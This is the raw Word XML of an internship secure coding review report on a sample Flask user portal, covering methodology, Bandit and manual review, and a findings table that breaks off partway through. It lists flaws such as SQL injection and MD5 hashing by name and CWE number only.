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color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CodeAlpha Cyber Security Internship</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure Coding Review Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 3 — Application: Sample Python/Flask User Portal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="700"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared as part of the CodeAlpha Cyber Security Internship</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review Date: July 12, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used: Bandit (static analysis) + Manual Secure Code Review</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pPr>
      <w:r>
        <w:t xml:space="preserve">This report documents a secure coding review conducted on a sample Python/Flask user-portal application, built specifically for this exercise to reflect realistic patterns found in production codebases (authentication, session handling, file access, and administrative functions).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The review combined automated static application security testing (SAST) using Bandit with manual line-by-line inspection. Ten distinct vulnerabilities were identified, spanning injection flaws, weak cryptography, broken access control, and insecure configuration. All ten were remediated in a corrected version of the application, and the fix was re-verified with the same Bandit scan to confirm no High or Medium severity issues remain.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pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Before Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">After Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Total findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">10 (manual) / 10 (Bandit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">0 High / 0 Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">High severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D68910"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Low severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E86C1"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">3 (informational only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope and Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The review target is a single-file Flask application (app.py) implementing: user login, a dashboard, user profile lookup, a network diagnostic endpoint, a file download endpoint, a preferences loader, and an administrative endpoint. The full source is provided in the vulnerable_app/ folder accompanying this report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Static Application Security Testing (SAST): Bandit v1.9.4 was run against the source file to flag known-insecure API usage patterns automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual Secure Code Review: each route handler was read line-by-line against the OWASP Top 10 (2021) and CWE Top 25 categories, tracing untrusted input (request.args, request.form, cookies, request body) from entry point to sink (SQL execution, shell execution, file I/O, deserialization, HTML rendering).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verification: after remediation, the identical Bandit scan was re-run against the fixed application to confirm the High/Medium findings were resolved and no regressions were introduced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bandit 1.9.4 — Python static analyzer (pip install bandit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual code review against OWASP Top 10 (2021) and MITRE CWE Top 25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python 3.12 reference environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Findings Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Findings are ranked by severity (High &gt; Medium &gt; Low), reflecting realistic exploitability and impact if the application were deployed as originally written.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400"/>
        <w:gridCol w:w="1900"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">#1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardcoded Secret Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E86C1"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-798</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">app.py:22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">#2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Injection (login + profile)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D68910"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">app.py:44, 81</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">#3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak Password Hashing (MD5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-327</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
